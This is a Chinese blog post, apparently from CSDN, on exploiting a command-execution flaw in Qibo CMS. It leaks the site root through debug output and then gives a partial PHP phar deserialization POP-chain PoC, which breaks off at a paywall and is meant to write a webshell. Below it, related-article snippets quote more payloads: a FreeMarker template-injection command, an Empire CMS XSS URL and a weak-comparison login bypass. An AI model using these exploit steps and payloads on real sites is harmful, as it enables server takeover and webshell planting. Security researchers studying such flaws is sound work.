某cms代码审计

最新推荐文章于 2025-10-15 01:05:50 发布
原创 最新推荐文章于 2025-10-15 01:05:50 发布 · 892 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #深度学习 #安全 #安全漏洞

本文详细介绍了齐博CMS系统中存在的命令执行漏洞,从揭露网站根路径开始,通过生成并利用phar文件,实现文件上传,最终在系统中写入webshell。此过程展示了漏洞的利用步骤和安全风险。

[齐博CMS系统存在命令执行漏洞]

【技术资料】

漏洞利用过程:

1 首先爆出网站跟路径:

访问:

/index.php/cms/1

会在debug里看到网站根路径! 如果开了debug的话!
在这里插入图片描述
然后根据网站根路径修改poc! 看poc里的注释!

2 利用poc生成 phar文件

poc

<?php
namespace think\process\pipes {
   
   
    class Windows {
   
   
        private $files = [];

        public function __construct($files)
        {
   
   
            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
        }
    }
}

namespace think {
   
   
    abstract class Model{
   
   
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
   
   
            $this->parent = $output;  //$this->parent=> think\console\Output;
            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error
            $this->error = $modelRelation
最低0.47元/天 解锁文章
网络安全审计之CMS代码审计
kali_Ma的博客
12-29 3532
0x00:环境说明 Windows 10 Phpstuby Php版本:7.2.9 CMS版本:MetInfo7.5.0 0x01:目录结构 |-- about |-- about1 |-- admin |-- app |-- cache |-- case |-- config |-- download |-- favicon.ico |-- feedback |-- hits |-- img |-- include |-- index.php |-- install |-- job |-- member
cms代码审计之命令执行
化鱼的博客
07-05 455
0x01 序言 在社区看到一个大佬的分析,过程很详细。自己跟着走了一遍,收货颇多。 0x02 话不多说就是干 漏洞出现在App\Weibo\Controller\ShareController.calss.php中的 使用了 I()函数获取了query的值,并进行了解码。然后display模板,看下模板那里 Common/functions.php看下W() W()是渲染的功能, {:W('Weibo/Share/fetchShare',array('param'=>$parse_array))
cms代码审计-详细-Empire CMS v7.5后台XSS
qq_47604261的博客
11-08 514
参考资料(含下载链接) 版本 Empire CMS v7.5 漏洞 xss 复现 1)访问后台 漏洞url http://b.com/e/admin/openpage/AdminPage.php?leftfile=..%2FShopSys%2Fpageleft.php%3Fehash_loRqO%3DNspU9dpDDGEOxrTMIPbV&mainfile=..%2Fother%2FOtherMain.php%3Fehash_loRqO%3DNspU9dpDDGEOxrTMIPbV&ti
代码审计】MCMS-5.2.8
最新发布
pwfortune的博客
10-15 1031
检测到xss的攻击,但是没有进行任何的处理,直接将content原样拼接到异常消息中,这个异常消息最终被包装成http响应返回给前端,导致了xss的攻击。但后续会获取当前的网站根目录,然后直接拼接路径,也就是说可以将文件写入到网站的根目录下面,而不是原本的默认的模板下面。通过查找调用链,可以看到有四个地方调用了这个方法,一个一个的查看用法,是否存在可以利用的地方。上传zip压缩包,然后抓包,修改上传文件,有返回上传路径,但无法进行目录穿越的利用。
代码审计之xxcms
温和的跳跃
11-02 635
1.安装工具 我觉得php最简单 然后代码审计的人最多,所以找到一个开源的cms。 安装phpstorm 和cms 还有phpstudy(这个好像也很多漏洞。。) 2.看看后台 使用一下功能 从功能的角度思考(目前在这里……) 3.看代码(还没有进行…… ...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4209
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
“快看”cms代码审计
hackzkaq的博客
09-15 1802
引入转义文件转义防sql注入,变量content经过null_back()函数处理,(该函数可以全局搜索到定义,作用是判断字符串内容是否为空,没有任何过滤)又使用addlashes()方法处理变量,防注入,其他变量都没问题,但这个$_POST[‘content’]变量,不是又经过了双层转义处理?对$_GET[‘cid’]变量,不经过滤,直接单引号包裹,文件头没有引入转义函数文件,带入查询,典型的sql注入:sql注入(但是这里审计出来的代码闭合方式应该是单引号闭合,但是测试却失败了,这是怎么回事?
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
极致CMS审计报告详解 本文档将详细介绍极致CMS(以下简称JIZHICMS)的安全审计报告,涵盖... 某 cms 代码审计引发的思考. Retrieved from 资源 * 极致CMS官方网站: * 相关安全研究文献:<https://xz.aliyun.com/>
cms代码审计
03-27
CMS登录模块使用: ```php if ($_POST['password'] == $user['password']) { // 双等号弱比较 // 登录成功 } ``` 输入`password=0e123`可能绕过MD5校验。 #### 四、注意事项 1. 审计前建立与目标CMS版本...
ofcms代码审计
weixin_45653478的博客
07-30 1104
最重要的是,找到模板注入请求的后端API注入的命令为:<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}发现请求的路径如下:为/src/main/java/com/ofsoft/cms/admin/controller/cms/TemplateController.java后台->模板设置->模板文件->模板目录->修改index.html在 com.ofsoft.cms.admin.controll
熊海cms——代码审计
mingyqf的博客
03-07 4384
前言 再基本了解了代码审计的方法后,看着各个师傅的客跟着他们一步一步代码审计。 审计环境 使用小皮面板,新建网站 接着直接打开网站的install 就可以开始安装了 ps:至于为什么不能用php7.4.3 环境 安装请知道的师傅call 我 万分感谢! 审计过程 先了解文件目录 admin --管理后台文件夹 css --存放css的文件夹 files --存放页面的文件夹 images --存放图片的文件夹 inc
CmsEasy代码审计1
08-03
2. 在件 lib/table/tdatabase.php 的 restoreTables 函数可以看到,file_get_contents() 函数读取件内容
CMS代码审计目录
王嘟嘟的博客
12-03 854
0x00 前言 之前的目录出现了一定的逻辑问题,所以只好重写弄一个cms代码审计的目录。 https://blog.youkuaiyun.com/qq_36869808/article/details/83029980 0x01 CMS web渗透测试练习——熊海cms V1.0 ...
从一个小众cms入门代码审计
weixin_30555515的博客
03-21 628
前面有一段时间审计了一个小众的cms发现了很多漏洞,作为一个新手,个人觉得最开始学习代码审计的时候从一些简单的系统学起是很有必要的,比如最开始可以从bwapp、dvwa等,然后再慢慢过渡到一些小众的cms,然后可以过渡到像dede、wordpress这些,虽然不一定能审计出漏洞,但是学习到他们的一些防御机制还是很有收获的(虽然自己还没有到达这个阶段.......Orz) 前言 每个人都...
cms的一次审计
xj28555的博客
06-14 1052
前言 记一次某cms的一次比较全面的审计(除了插件部分,我觉得应该审计的差不多了),大佬们轻喷。 其实插件部分已经被爱吃猫的闲鱼师傅审计发到先知上了 文章地址:某cms代码审计引发的思考 细心的朋友读完我这篇文章应该就能发现其实是同一个cms 网站目录结构 . ├── 404.html ├── A(admin后台的一些文件,审计重点) ├── Conf(一些网站的配置文件,公共函数) ├── FrPHP(框架) ├── Home(用户的一些文件,审计核心) ├── Public(上传文件保存的
Java代码审计之ofcms
Java_ttcd的博客
08-12 472
还有一个freemarker模板注入漏洞,因为我自己也没整明白,也就没办法分析了。等以后审计能力够了会再写。还有一个问题,关于上传jsp文件为什么执行不了——是因为存在jfinal过滤器,所以没有办法传上去。运行后,输入自己的数据库信息。这里根据控制器,看每一个接口走下来,最终也是审出来了。...
HisiCms代码审计
化鱼的博客
09-02 398
Cms安装处Getshell 我们首先看cms安装代码,比较容易出现问题的一般是执行安装时获取数据库信息环节 private function step4() { if ($this->request->isPost()) { if (!is_writable($this->root_path.'config/database.php')) { return $this->error('[config
OFCMS代码审计
as you know, nlp is fantasitc!
08-19 1075
这次搭建环境比较顺利,没有遇到什么坑点,于是将前面学的应用到实际的框架审计中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值